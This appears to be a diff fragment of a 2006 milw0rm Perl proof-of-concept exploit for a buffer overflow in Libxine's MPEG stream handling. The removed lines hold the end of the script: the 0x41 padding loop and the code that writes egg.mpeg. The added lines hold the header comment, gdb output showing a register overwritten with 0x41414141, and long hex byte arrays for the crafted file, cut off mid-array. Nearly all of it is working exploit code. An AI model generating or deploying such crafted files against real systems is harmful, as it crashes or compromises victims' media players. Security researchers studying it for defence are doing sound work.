-"\xC1\x93\x2D\x8B\x8A\x24\xC4\x98\x50\x00\x19\x08\x84\xD2\x10\x19\x21\x7C\xF6\x0A\x50\x1B\x0A\xEB". -"\xB6\xC9\x8D\xB2\xE0\x40\x2D\x88\x98\x06\x0C\x16\x90\x77\xAB\xDD\x08\x10\xA9\x2F\x1D\x7F\x79\xC1". -"\x40\x82\xB3\xA1\x90\xF6\xAE\xC0\xA7\xC0\x96\x00\x9D\x02\x43\x42\x9B\x22\x03\x4A\x49\x20\x01\x54". -"\xC4\x03\x00\xC8\x30\x43\x24\x67\x20\x41\x92\xD6\xEB\x51\x99\xB5\x24\x12\x21\xA4\x96\x13\xB9\x98". -"\x99\x6B\x8D\xC0\xC5\x3E\xBC\x74\x7E\x2C\x00\x01\x15\x67\x43\x21\xEE\xE0\x94\xBF\x6A\x50\x8C\x8E". -"\x10\xD0\x8D\x46\x8C\x84\x41\x41\x32\xE1\x78\xEB\xFD\x41\x06\x00\x05\x78\x43\x21\xF3\x7B\x02\x4B"; - - -for ($i = 0; $i < $len; $i++) { -$buffer .= "\x41"; -} - -open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\n"; -print EGG $header; -print EGG $buffer; -print EGG $end; - -close(EGG); - -# milw0rm.com [2006-04-04] +#!/usr/bin/perl +##################################################################### +# Libxine <= 1.14 : MPEG Stream Buffer overflow vulnerability / PoC +# +# Federico L. Bossi Bonin +# fbossi[at]netcomm.com.ar +#################################################################### + + +# (gdb) run /tmp/egg.mpeg +# Starting program: /usr/bin/gxine /tmp/egg.mpeg +# Program received signal SIGSEGV, Segmentation fault. +# [Switching to Thread -1276580944 (LWP 30688)] +# 0xb7edee9a in xine_list_delete_current () from /usr/lib/libxine.so.1 +# (gdb) x/x $ebp +# 0x8e2cbd4: 0x41414141 +# (gdb) + +my $EGGFILE="egg.mpeg"; +my $len=2024; + +my $header= +"\x30\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C\x2E\xA9\xCF\x11\x8E\xE3\x00\xC0". +"\x0C\x20\x53\x65\x2E\x00\x00\x00\x00\x00\x00\x00\x11\xD2\xD3\xAB\xBA\xA9\xCF\x11\x8E\xE6\x00\xC0". +"\x0C\x20\x53\x65\x06\x00\x00\x00\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20". +"\x53\x65\x72\x00\x00\x00\x00\x00\x00\x00\x40\x9E\x69\xF8\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C". +"\x44\x2B\x50\xCD\xC3\xBF\x8F\x61\xCF\x11\x8B\xB2\x00\xAA\x00\xB4\xE2\x20\x00\x00\x00\x00\x00\x00". +"\x00\x00\x1C\x00\x00\x00\x08\x00\x00\x00\x01\x00\x40\x34\x7C\x00\x61\x01\x01\x00\x80\x3E\x00\x00". +"\xD0\x07\x00\x00\x80\x02\x10\x00\x0A\x00\x00\x22\x00\x00\x0E\x00\x80\x07\x00\x00\x01\x80\x02\x80". +"\x02\x01\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20\x53\x65\x81\x00\x00\x00". +"\x00\x00\x00\x00\xC0\xEF\x19\xBC\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x57\xFB\x20". +"\x55\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x33\x00\x00\x00". +"\x00\x00\x00\x00\x02\x00\x40\x34\x7C\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x02\x28\x00\x28\x00\x00". +"\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x01\x00\x18\x00\x57\x4D\x56\x31\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x01\xCD"; + + +my $end= +"\x24\x84\x21\x00\x06\x06\x94\xA4\xB4\x92\xF5\xA7\x55\x54\x7E\xB6\xB3\x3A\xE9\x65\xA7\xEE\xDE\x9B". +"\x7B\xE4\x25\x34\xA1\x08\x13\x29\x21\xB4\x54\x4D\x0F\xA0\xA1\x3C\x74\x83\x0D\x1A\x32\x36\xAB\xC6". +"\x91\xD5\xD0\x88\xC6\x62\x1E\x71\x65\x2F\xDC\x44\xAE\x0B\x78\x74\x14\xD3\x84\x9F\xCE\x80\x80\xA2". +"\x52\x94\x41\xA8\x84\x3B\x09\x09\x44\xA2\x1B\xD4\xA7\x1B\xC7\x52\xDF\x00\x83\x23\x19\x88\xF6\xA5". +"\x09\x9A\x9C\x78\x6F\xA9\x7E\x9A\x52\x2A\x8D\x12\xD0\x46\x88\x68\x54\x24\xB2\x53\x51\x14\x09\x10". +"\x11\xB2\x60\xED\x83\x30\xAA\x27\xA6\xC4\x32\x37\x20\x06\xB4\x4A\xB2\xD5\x40\x2C\x88\xC4\x0E\x63". +"\x15\x59\x19\x6C\x30\xBC\x75\xFE\x1E\x50\x10\x43\x63\x21\x1E\xFD\x44\x31\xF0\xA1\x69\xF3\xB2\xFE". +"\x60\x01\x24\x58\x54\x1A\x81\x44\xD5\x4C\x22\x94\xC4\x00\x6A\x69\x70\xE5\xA9\x63\x4C\x5D\xA6\xCB". +"\x2A\xB0\x1E\xEC\x36\xE2\x03\x4E\x98\xC0\x08\xBB\x76\xB5\xD0\x5E\x1E\x3A\xBE\xFA\x02\x81\x05\x35". +"\x31\x11\xED\x5A\x94\x19\x5B\x41\x42\x00\x7C\x52\x52\x02\x13\x74\x6C\x2A\xC2\xC0\x21\x92\x50\x29". +"\x82\x96\x61\x9D\x4C\x88\xD5\xC6\x5A\xA8\xB4\x11\x07\x71\x37\xB4\x91\x62\xAD\x81\x2C\x56\x4F\xBB". +"\x4D\x75\x73\x1E\x3A\xFE\xFF\x00\x81\x85\x35\x32\x11\xEF\xD4\x83\x91\xA8\xAA\x87\xE6\x9A\x68\x29". +"\x29\xB8\x74\x64\x41\xD1\x46\x93\x2B\x0A\xA9\x04\x1A\xA0\x12\x4C\xAF\x67\x4A\x99\x00\x6F\xB6\x33". +"\x62\x40\x32\x35\x01\xAA\xEC\x02\xD6\x75\x2E\x4E\x6A\xAE\x71\x95\x78\xE9\xFB\xDC\x00\x00\x02\x22". +"\x98\x90\xF6\x34\x99\x8A\x50\x00\x7E\xED\x8B\xF0\xEA\x22\x20\x96\x36\x40\x6C\x02\x18\x0B\x0B\xE2". +"\x83\x25\x2D\x29\x32\x22\x61\x59\x8B\x32\x25\xCF\x52\x24\x96\xF3\x64\xE8\x19\x3B\x20\x41\x52\x75". +"\x5B\x4F\x93\x85\xE3\xAB\xEF\x98\x30\x20\xA8\xC6\x42\x3D\x7F\xB0\x82\xD1\x44\x53\xC4\xF8\x50\xB1". +"\x12\x2A\x4C\x32\x01\x56\xAC\x43\x24\x10\x69\x4A\x09\x13\x15\x68\x86\xCD\xFA\x0D\xC7\x2C\x02\xFD". +"\x2B\x24\x86\x2F\x86\x96\x09\xD3\x44\xCA\x85\x2C\x0C\x10\xC2\xDB\x5A\xE9\x8F\x1D\x3F\x68\x08\x08". +"\x18\x44\x53\x12\x1E\xF6\x62\x03\xF4\xD0\x92\x38\xA8\x09\x4A\x5A\x9D\xC4\x2A\xC8\xA2\x62\x20\x86". +"\x48\x4D\x49\x24\x26\xAA\x02\x0F\x47\x85\x30\x18\xE4\x5B\xA8\x83\x07\x7A\x20\xED\xBB\x90\xC2\xEB". +"\xE7\x0E\xE6\xD7\x83\x9F\x6F\x1D\x4F\x84\x85\x05\x45\x31\x21\xEF\x55\x41\xA5\xD9\xA2\x69\xA5\xF2". +"\x69\x0E\xA9\x2A\x89\x50\x40\x64\x40\xA8\x11\x86\x94\xBB\x02\xAD\x44\x48\x06\x41\xFB\x78\x20\x29". +"\x02\x37\xC2\xD3\x68\x62\x74\x5A\x22\x5A\x1B\xB6\x29\x5F\x9C\x08\xE9\xE0\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x00\x00\x00\x00\x08\xDA\x24\x00\x00\x1C". +"\x0C\x00\x00\x5B\x02\x13\x77\x85\x0B\xAA\x81\xE6\x94\x6E\x4E\x58\x82\x30\x25\xD2\x0F\xA5\xFC\xE0". +"\x80\x48\x7A\xC5\x11\x6E\x0E\x31\xF8\x10\x5F\x37\x14\x53\x3E\x9B\xE1\xBA\xAB\x81\xF0\xF6\x21\xE2". +"\x47\x5E\x7F\xFE\x12\x41\x46\x78\x7D\x3B\x44\x42\x2E\xC7\x98\xF1\x67\xF2\x7E\x86\x88\x07\xF7\x21". +"\x2D\x35\x88\x20\x9B\x82\x36\x0D\x90\xB8\xA6\x33\x18\xA4\x86\x1B\x2E\x43\x40\x61\xF8\x73\x90\xCC". +"\xF9\xC6\xFF\x63\x05\x96\xE5\x45\xFB\xB3\x40\xAD\xC5\x81\xCF\x67\x50\x70\x51\x2B\x9D\x9F\x55\xF0". +"\x2F\x24\x2A\xF0\xE8\xB2\x61\x29\x47\x69\x4A\x84\x2C\x7B\xAD\xD4\xC3\x06\x96\xD5\x03\xD0\xC1\xF4". +"\x4E\x65\x64\x0A\xE8\x14\x32\x40\x42\xE1\x11\x08\x40\x29\x1D\x97\xC8\x33\x1B\xCC\x20\x5D\x6D\x85". +"\x82\xAF\x34\x2F\x43\xC3\x58\x8D\x9F\x28\x91\x51\x3C\x3A\xAC\x63\x7C\xFE\x2F\xCE\xB6\xDE\x65\xC5". +"\xB1\x83\xD8\xC1\xEF\xFF\x15\x68\xF3\xD9\x24\xB9\x97\xF2\x72\xEE\x08\xCC\x7C\x47\x8A\xA5\xE5\xD9". +"\x78\xF6\x2E\x37\xF4\xEA\xB0\x55\xE1\xD5\x41\x55\x05\x54\x08\x48\xCC\x3A\x27\x10\x0A\x92\xF6\x44". +"\x64\x20\x75\x5E\x77\x57\x64\x37\x1A\x55\xEE\xB4\x83\x6F\x2D\x24\xB4\x69\xDD\x88\xCB\xED\x30\xA0". +"\x1E\xF2\x18\x01\x00\x90\x24\x80\x01\xE6\xD4\x64\x53\x6C\xC6\xF5\x8C\x4B\xBC\x90\x0B\xD3\x9A\xD5". +"\x6D\xD1\x28\xBE\x78\x77\x8A\x47\x57\x67\xB4\x77\x3D\xEF\xD5\x76\x5C\xD9\x9E\xD2\x42\x93\x8A\x42". +"\x69\xBD\x14\x16\x30\x40\x4F\xE8\xF2\x33\x90\x21\x34\xA9\xDD\x62\xBC\xCB\x9C\x7A\xCF\xE5\x47\x08". +"\xA4\xA4\xCD\xE6\x44\xC3\xBF\x11\x60\x25\x14\xC6\x48\xFA\xEC\x7F\x9F\x6A\x24\x11\x74\xAA\x32\xCB". +"\x29\x27\x75\x63\xB9\xC8\xF3\xDE\xE8\xFC\xBE\xE5\xE8\x1C\x11\x7F\xDB\xBC\xDB\x75\x4D\xDB\xC9\xDD". +"\x1D\xE9\xE2\x81\xE1\x82\x80\x00\x2C\xA7\x14\x80\x8A\x4D\xF0\x8E\x4A\xED\xA6\x19\xA7\x07\xAD\xCC". +"\x10\x94\xA1\xC0\xCD\xFC\xBD\x38\x7C\x83\x72\x26\xB6\xCB\xE1\xB8\x34\xB4\x1A\x5C\x3E\xAB\x25\xAF". +"\x8E\x0E\x0C\x89\xE7\x8B\x17\x0C\x9B\x27\x06\x40\x06\x2F\x37\x2A\xC1\x7F\x3E\xD5\xC0\x09\x8D\x9E". +"\x96\xED\x23\x08\xB3\x11\xDE\x7D\x60\xE2\xCA\xE5\x12\x28\x02\xF0\x5F\x23\x82\x3D\xB2\x3B\xEE\x81". +"\x63\x61\x85\xFE\x8D\x06\x50\xE1\xD8\x50\xE6\xAD\xC5\xD0\xC3\xE8\x02\x4F\xA5\xC9\x59\x51\xF3\xAF". +"\xB0\x89\xC8\x54\x59\x66\x24\x25\x65\x09\xEB\x75\x73\x74\x1D\x22\xAD\xA6\x06\xD5\x3F\x50\xCD\x7E". +"\xC0\xD7\xA2\x18\x0C\x71\x81\x8C\x25\x06\xCE\x57\x8D\x51\x80\x52\x4E\xDB\x66\x15\x13\xB2\x4C\x05". +"\x12\x35\xF6\xC9\xA9\x9F\xF6\x5C\xE2\xB4\xA1\x91\x49\x2D\xEC\x79\x25\x82\x5B\x68\x30\x13\x1A\x80". +"\xD2\x98\xC5\x91\xCC\xD2\xEB\xD4\x80\x56\x17\x0B\xB6\x18\x5C\xC3\xCC\x80\x09\x80\x03\x06\x73\xF2". +"\x6C\x20\x11\x23\x3A\x09\xB4\xA8\x82\x00\x00\x08\x5D\x02\x64\x00\x00\x00\x64\x00\x82\x01\x5B\x02". +"\x00\x00\x08\xDA\x24\x00\x00\x1C\x0C\x00\x00\x7A\x9A\x13\x14\x00\xCC\xC2\xC0\x10\x41\x10\x58\x2C". +"\xD0\x46\xF2\x4A\xFC\xEE\x68\xF1\x54\xC6\xF1\x89\x80\x27\xC6\x31\x60\x29\x71\x4E\x01\x9D\xDB\x57". +"\x31\xDA\xAF\xDB\x3A\x5F\x14\x0E\xA7\xC7\x53\xFB\x24\xDF\x60\xEB\xC3\xBA\xA4\x77\xC5\x2A\x62\x90". +"\x3D\x20\x04\x84\x62\xDF\xA7\xF5\xE9\x4D\x54\x15\x50\x55\x41\x55\x01\x55\x5D\x6D\x06\x98\x78\x51". +"\x18\x61\x96\x44\x25\x98\xE2\x34\xCC\x80\x08\x2F\xC8\x4A\x28\x67\x55\x08\xE1\xE6\x20\xEB\xDF\x93". +"\x12\x19\x32\xBF\x06\xC9\x93\x0C\x40\xB9\x1E\xF6\x24\xA7\x3A\x76\x72\xF4\x21\x3B\x18\xA7\x69\x41". +"\x37\x88\x51\x3E\x0B\x73\xAD\xE4\x67\x04\x4B\xB9\x97\x27\x6B\x5C\xF7\x74\x9A\x6E\xD1\x1B\x8A\x28". +"\x8E\xA5\x55\xBB\x23\x72\x65\xE5\xDC\x51\x6A\x7A\xA3\x1C\x50\xD1\x9C\x53\x1A\xE1\x80\xF8\x90\x24". +"\x7E\xC2\xC6\x60\x32\x0F\x21\x58\x9B\x47\xE9\x3D\x67\x59\xDA\x34\xC8\xEA\xE8\x25\x34\xEA\x67\x41". +"\x03\xA2\x30\x4E\x10\xA6\x89\xD7\x4F\xA4\xA8\x6E\x75\x1E\x27\x2A\xC2\xAA\x33\xA6\x5B\x37\x55\x6C". +"\x89\x68\x23\xB9\x00\x84\x17\xB1\xB5\x1B\x03\x49\x21\xB8\x32\xD0\xAC\x32\x92\x07\x5C\x22\x8C\x0C". +"\xDB\xB8\x83\xBB\x94\x90\x00\x82\x29\xF3\x32\x6F\x42\x74\x38\xEC\xF6\x48\xF0\x8E\xD1\x98\xBA\x20". +"\xA0\xD6\xBE\xEA\x39\x6C\x11\x0B\x4E\x94\x0E\x41\x94\x61\x28\xF1\x80\xCC\x1B\x82\x53\xDC\x79\x0B". +"\xC2\x79\x82\x25\x2E\xD4\x8E\x51\x8A\x8E\xEB\x4E\x94\x0B\x58\xDD\x39\xDE\x94\x5A\x4C\x8C\x25\x80". +"\x15\x25\x87\x05\x3F\xCA\x19\x23\x0E\x04\xAE\x4E\x1D\x16\x57\x2D\x89\x25\xA3\xB2\x3A\xB5\x6C\x38". +"\x53\x0B\xBA\x2A\xE0\xED\xF9\x4B\x84\x8A\xAC\x0B\x38\x98\xC5\x12\xC9\x99\xE9\x7D\x92\xC8\x05\x13". +"\xE4\x04\x30\xCE\x80\x1D\x03\x2F\x72\x36\xDA\xC8\xF5\x0A\x19\xD1\x45\x00\x1B\x10\x78\x28\xAA\xCA". +"\x43\xA3\xA1\xCD\x91\x79\x44\x60\x33\x00\x5E\x78\x70\x0E\x33\xDD\x68\x6B\x63\x93\x19\x21\x73\x52". +"\x9B\x6D\x02\xF5\x76\x94\xAD\x8E\xC2\xC8\xD0\x01\x39\xF0\x89\x90\x03\x90\xC4\x1B\x94\x88\xE0\xC3". +"\x46\x06\xD0\xCB\xD4\x08\xCB\x30\x38\xC2\xF3\x62\xD2\x68\x1A\x21\xED\x87\xE1\x82\x98\xE6\xC4\xC2". +"\xBE\x1D\x25\x6D\x75\x93\x37\x4A\xE9\x32\x80\xD2\xB8\x26\x28\xA2\x05\x62\x30\x86\x81\x0B\xBA\x05". +"\x8F\x07\x80\x3C\x00\x17\x04\x01\x50\xC0\x87\xF1\xEC\x20\x53\x5D\xAF\x36\x22\xBC\xC4\x42\xE3\xC3". +"\xA3\x7C\x10\x85\x00\x27\x58\x8F\x98\x40\x11\x9A\x83\x53\x7A\x02\x43\xB7\xEE\x2F\xAA\x33\x6C\x2F". +"\xC8\x09\x1B\x21\xCD\x6D\xCE\x14\x04\xF8\xAF\x67\x71\x12\x44\xA3\x92\xA7\x4A\x9A\xA7\x14\x7F\x99". +"\x22\x91\xD6\x5E\xDE\x88\xEA\x78\x07\x04\x46\x39\x2C\xA1\x99\xC5\x7C\xDB\x27\x26\x42\x3A\xC7\xA8". +"\x2A\xA0\xAA\x82\xAA\x0A\xA8\x0A\x77\x6A\xA7\x7E\x5E\xD9\xB2\x9D\x96\x08\x99\xCB\xC4\x08\x34\xC2". +"\x3D\xAD\x26\x04\xE9\xC0\x82\xF4\x00\x8E\xC8\xBE\xC3\x43\x76\x18\x04\x17\x9B\xB8\x57\xA0\xC9\x06". +"\x98\xE5\x05\x19\x9F\xF8\x44\x5B\x23\xD6\x8E\xDB\x73\xD5\xB7\x88\x22\x40\x61\x61\x0C\x01\x18\x16". +"\x67\xC0\x18\x4C\x96\xA8\x9F\x6A\xEE\xB4\x23\x6C\x60\x77\xCD\xAA\x37\x63\x7C\xFE\x9E\xB0\x1D\xC9". +"\x79\x2C\xDD\xFF\x95\x59\xF5\x2C\x67\x8B\xFF\x3D\x1A\xFF\x76\x2A\xEF\x00\xFF\xA5\xAF\x29\xE9\xCC". +"\xDA\x03\xDB\xB9\x40\x09\xA9\x41\x35\xB1\xC6\xB0\x05\x8C\x30\xF4\x05\xF8\xD0\xA4\x3A\xB9\x2C\x40". +"\x66\x86\x00\x50\xE4\xD1\x08\xB8\x2D\x8E\x26\x94\x2A\x68\x46\x4C\x86\xAC\x37\x1B\xA1\xD9\xC8\xCA". +"\x3E\xBD\x5D\x09\x06\xF5\xEB\xD0\xEC\xC3\x30\xB8\xAA\x8B\xD5\xB7\x9B\xCC\x68\x1C\xA3\xAD\xF7\x48". +"\x6B\x6D\x02\x44\xC8\x76\x77\x9D\xAC\x9F\x47\xC3\x61\x33\xDA\x53\x85\x10\x83\x1C\x28\x19\x86\x6B". +"\xC3\xCD\xC4\xE7\x83\x14\x02\x4B\x59\x85\xB1\x4D\xB6\x44\xE3\x5E\x02\x89\x94\x0E\x88\x8E\x3E\x70". +"\x02\x06\x28\xD9\xD5\x48\xF0\xDF\x37\xD8\x07\xE0\x39\x93\x3F\xE6\x87\xAE\x26\x33\x36\x85\x40\xF7". +"\xB7\x4F\xD7\x53\x35\xD4\xB5\x48\x9C\x5E\x35\x4C\xFC\xEE\xBB\x34\xB8\x21\xD2\xEE\x08\xEE\x28\xC8". +"\xE5\x04\x40\x87\xFF\xAD\xDE\x62\x7C\x94\x0E\x5F\xF9\x1D\x99\x64\xF1\x19\x62\x5A\xE2\x03\x4D\x1E". +"\xA5\xAC\x9D\x9F\x75\x33\xBF\x26\x83\x45\x86\xA3\x3F\x8E\xBA\x33\x08\xF8\x4B\xA7\x80\xDA\xCB\x70". +"\x0F\x08\xFE\xB1\x0E\xBA\xF0\xBF\xF5\x53\x1B\x1E\x87\x09\xCF\x89\x07\x4A\xAA\xC7\x5F\xC8\x66\x5E". +"\x8C\xF2\x9B\xEF\xFB\xFD\x6A\x93\xD3\x7C\x10\xC1\x48\xAD\xA1\x71\x18\x72\x09\xD4\x7F\xA1\x29\x1B". +"\xA9\x79\x68\x16\x2F\x5E\xCA\xCA\xA0\x1F\x65\xBC\x64\x9F\xF5\x69\xF9\xEB\x10\x92\x14\x02\xF4\xA5". +"\x0E\x22\x02\x83\x69\x1A\x87\x0C\x72\xB5\x60\x09\xD3\xA0\xD2\x3E\x14\x01\xF3\x9F\xCA\x87\xEA\x66". +"\x7E\x2A\x90\x7B\xDB\x24\xBF\x79\x48\xEC\x73\x94\x29\x25\xEF\x68\x36\xC8\x61\xCB\x0F\xA8\x17\x1C". +"\xE2\x3A\xD2\x23\xFF\x2D\x92\xF6\xC9\x71\x64\xE5\x8C\xAE\x4C\x52\x17\x1F\x20\x90\x53\xBB\x3A\x9C". +"\x23\xDB\x32\x6C\x32\x46\x26\xC8\x58\x81\x5B\x07\xD4\xAA\x27\x55\x22\x00\x7C\xD8\x4B\x9C\xBA\x3B". +"\x6C\x4F\x05\xA1\x0B\x20\x00\x6F\x1A\x85\xC2\x91\xA9\xFB\x59\x88\x6C\xFD\x28\xFB\x20\x88\xB0\x18". +"\x04\x0F\xC9\xD3\x9C\x70\xA3\x74\xC3\x96\x4B\x6A\xCA\x6B\x57\x36\x46\x24\xDD\xE4\xA3\xA1\x18\x77". +"\x97\x26\xE1\xAA\xE7\x67\x6F\xB9\xBC\x95\x4F\x37\xFA\x3A\xE5\x55\x3B\xAD\xB5\x9C\xA1\x91\x5A\xB4". +"\x82\xE0\x94\xEA\x32\x45\x30\x0D\x96\xE8\x29\x36\xCC\x4F\xF9\xDD\x26\x51\x9B\x4C\x86\x81\xD4\xF1". +"\x9A\x41\xDB\x08\x7D\xED\xDB\x08\xC4\xE6\x06\x8D\x30\x82\x32\x1B\xF8\x6D\xB1\xFD\x83\xC1\x32\x80". +"\x90\x22\x17\x25\xD9\xB1\xA9\xCD\x61\x34\xE7\x8B\x20\xC7\x19\x00\xFC\x53\xB9\xFF\xDD\xCD\x96\xF9". +"\x55\xC9\xC9\x96\xAB\xA5\xDA\x23\x0E\x87\xB2\x81\xDB\x47\x70\x32\x1A\x2D\x2C\x35\x50\xAA\xA1\xB4". +"\xA8\x82\x00\x00\x08\x5D\x02\xC8\x00\x00\x00\x64\x00\x82\x01\x47\x07\x00\x00\x08\xDA\x24\x00\x00". +"\x1C\x0C\x00\x00\xD5\x41\x55\x05\x54\x05\x70\x6C\x49\x94\x02\xD4\x52\xA2\x18\x89\x04\xD4\x02\xCF". +"\x10\x38\x16\x29\xCB\x41\x08\x43\xA5\xB0\x69\x31\x8C\x37\x39\xE4\x14\x3B\xB7\x04\x83\x68\x11\x81". +"\x63\x84\xA0\x06\x73\x76\x13\x22\xF1\x10\x15\x02\x15\x06\x8D\x13\x4D\x51\xAC\xC8\xE6\x18\x57\xBE". +"\x39\x3D\x36\xF6\xFE\xAD\xDB\xED\x47\x41\xCA\xA7\x7A\x6D\x0E\xD4\x8E\xA7\x28\x8A\xA4\xBE\xA6\xDB". +"\xEF\x41\xEF\x97\xCE\xF9\x4E\x0E\xCF\x15\xC8\x22\x63\x9F\x04\x14\x98\xC2\x0C\x23\xCC\x10\x29\xE3". +"\x85\x65\x72\x00\x6B\x56\xFD\x24\xE7\x2D\x02\x19\xD1\x33\x0D\xD1\xC8\x59\x80\xD8\x11\x74\xCC\xBD". +"\xB0\x4F\x84\xFE\xA4\x77\x62\x99\xDA\xC4\xA1\xA0\xA3\x08\x9C\x5F\x55\xF6\xC1\x11\x38\x1D\xF2\x98". +"\x04\x37\xDB\xCC\x65\xBD\x6A\x1E\xBD\x51\xF6\xF7\x77\x7A\xA6\x7D\xAD\x9E\xE2\x86\xF8\x23\xEF\x2C". +"\xBC\xE3\x8A\x12\x40\x4B\x5C\xC1\x39\x6C\xC7\x8D\x21\xA6\x3E\x05\xBE\x23\x76\x0A\xFA\x9A\x40\x27". +"\x44\x75\xE6\xA7\x88\x2F\xD3\x65\x4E\x03\xA2\x5C\x22\x45\xD1\x22\x8D\x0C\x18\xD1\x2C\xCD\x2B\x7A". +"\x64\xE4\x7F\x7C\xB2\x4E\x8E\xAE\x22\x94\x76\xD6\x8F\x66\x2D\x09\xF1\x54\x81\x9D\x42\xC2\x75\x2D". +"\xC4\x8A\x3E\x91\xE7\xE3\x94\x7E\xDD\xA1\x2F\x2D\x96\x11\x5D\x97\x0A\x48\x6D\xB5\xE6\x39\x69\x28". +"\x27\x95\x14\xAE\x9F\xFD\xB9\x38\x8A\x3A\xCA\x6C\x6B\x3A\x92\x15\x66\x70\xC3\x80\x60\x9C\xEA\xA5". +"\x91\x91\xCA\x59\x3A\x1F\x4A\xBD\xF6\x95\x52\x89\xC9\xDA\x4F\x9C\xAA\x08\x4A\x00\xE9\x78\xC8\xA6". +"\xAF\x98\x4D\x47\x34\x84\x8E\x02\x68\xA9\xF5\xF2\xC0\x3D\x9E\xE2\xA2\xD7\xE2\x09\x62\x4A\xB2\xF0". +"\x2D\x09\x12\x01\x0E\xCD\x09\xD5\xAE\x30\x6F\xD4\x74\x72\x0F\x20\x1C\x82\xA4\x92\x92\xC8\x93\xC0". +"\x62\xE4\x4F\xF9\xE8\x72\x10\xB3\x95\xCC\x33\xF0\xC8\x52\x46\xCA\xCF\x0C\xEB\xA0\xC1\x1B\xC7\x5B". +"\xD7\x68\xCF\x40\xCA\x99\x8A\x29\xD4\x27\x41\x39\x51\x1A\x00\xB7\xC2\x38\x52\xE5\x59\xAD\x8F\xF9". +"\xC4\x67\x9C\x18\x6C\xFD\x73\xC5\x05\x65\xC6\x5B\x1A\x44\x34\x7B\x44\x02\xFE\x61\x13\x92\x9C\x8C". +"\x0D\x0E\x7C\xFF\xA5\xF2\xBB\x65\x65\x14\xA3\x69\x51\x3E\x95\x42\xB9\x01\x46\xAB\x60\x16\xD8\x3D". +"\x85\x76\x23\x71\x44\xD9\xDD\x55\xA7\x52\x40\x03\x74\x39\x60\xEF\x20\x98\xE6\xF4\xAD\xA8\x5B\x33". +"\x61\x73\xCC\xFD\x0C\x12\x6C\x72\x90\x4A\x84\xE0\x40\x10\xB6\x60\xDF\xEE\x0C\x13\xA7\xAC\x45\x6E". +"\x14\x6F\xE2\xA7\x32\x2C\x84\x60\x4D\xCA\x4F\xAB\x57\xB0\x78\xA9\x4E\x32\x07\x6C\x2F\xC6\x6C\x9F". +"\xF6\x5C\x03\x16\xCB\x79\x87\xA7\x0B\xB9\x36\xF8\x7F\xA0\xA5\x53\xCD\x02\xA3\xBD\x4A\x07\x0F\x94". +"\xA9\x5E\xD4\x7D\x4D\x04\x61\x93\x53\x11\x43\x43\x3F\x73\x7A\x9E\x1C\x09\x67\xB0\x86\x75\xEE\xD0". +"\x58\x91\x31\x9F\x5E\xEA\x7C\xC3\xD1\x2C\xE0\x20\xC2\x38\x21\x80\xD7\x81\x2E\x7E\x13\xD2\x38\xC2". +"\x25\x13\x80\x49\x81\xF8\x7D\x9A\xAB\xF9\xC0\x3D\x55\x70\xB9\x5A\x8E\x27\x1D\xF8\x74\x07\x00\xE2". +"\x8E\x4B\x97\xBF\x93\xD9\x1E\xA8\x1F\xF5\x2F\x1D\x28\xD6\xED\x92\xD6\xFF\x37\xDB\x66\x31\x3F\x33". +"\xBF\xD2\x63\xF1\xC9\xD9\x28\x2A\xEA\xEB\x7E\xEE\x6B\x6A\x75\x0E\xC4\x27\xAF\x03\x6F\xE0\xFC\x50". +"\x95\x27\x6E\x11\xC7\x10\x64\x08\x53\xF2\xA8\x5D\x21\x8C\x82\x71\x90\xFC\x3D\x26\x21\x8A\x4E\x64". +"\x25\x0D\x89\x28\xCA\xF8\x58\xA5\xF8\x93\xCB\x6D\xDD\x11\x69\x64\xBB\x22\x84\xD1\x79\x26\xEB\xB2". +"\xD5\x62\x5B\x7E\x2F\x93\x99\xFF\x29\xF5\x57\x1A\xBE\x11\x87\xB2\x67\x26\x4F\x49\x9D\xEE\x58\xFA". +"\x91\xD9\x4E\x00\xBA\x1F\x22\xB9\x98\x27\xCB\xA0\x30\x50\xA0\xB0\x82\xD4\x40\xB9\x3F\xC7\xAA\xA8". +"\xBD\x54\x15\x50\x2C\x40\x2E\x55\x43\x78\xD9\xF0\x89\x1F\x48\x5F\x70\x5D\xA4\x12\x22\x74\x8F\xA9". +"\x6A\x4F\x20\x00\x1A\xD5\x6B\xC0\xC9\x93\x2D\x97\xCE\x19\x5A\x46\x94\xAF\x6E\x69\xE9\x3D\x0E\x3F". +"\x8E\x96\x8D\x4E\xCA\x00\x78\x18\x47\xBB\x66\x54\x00\x00\xEE\x07\xB4\xC2\x6D\x75\x07\xB1\xDB\xFB". +"\xDA\xFF\xCA\x70\x7B\xE5\x28\xFA\xB3\x57\x1A\x88\x1D\x2A\xBE\xA4\x14\x9F\xF5\xDC\xF2\x8A\xA3\xF4". +"\x45\x07\x5B\xEA\xE4\x98\xBD\x18\x14\x90\xDD\x6E\x7D\x02\xD8\x90\x92\xC4\x24\x8A\x00\x67\x08\xAC". +"\xCE\xEE\x88\xB7\x04\xED\x74\x59\xF8\xE2\x96\xB6\x1F\x49\x00\x99\x9B\x04\x06\x30\x19\xD6\x84\xF7". +"\x21\x12\xC5\xC4\xD1\xC1\xEF\x7F\x8A\x7D\x99\x04\x49\xA2\x35\x6E\xFE\xD6\xEE\x6F\xEB\x31\xB3\xF8". +"\x65\xFF\xD5\x28\x55\x3F\xB2\xFA\xD0\x37\x53\xCD\xF4\x63\x15\xC5\x2C\xFC\x1C\x94\xA5\x21\x3C\x90". +"\x43\x0A\x46\xCD\xE1\x07\x5B\x39\x6A\xD0\x2D\x04\x9E\x8F\x31\xCA\xD8\xA6\x3D\x21\x0D\x52\x12\x5A". +"\x9C\xC9\x15\x13\x98\x30\x12\xC0\x77\x42\x0D\x10\x6C\x44\xD8\xD0\xB5\x7C\x3F\x53\x85\xCA\x27\xA8". 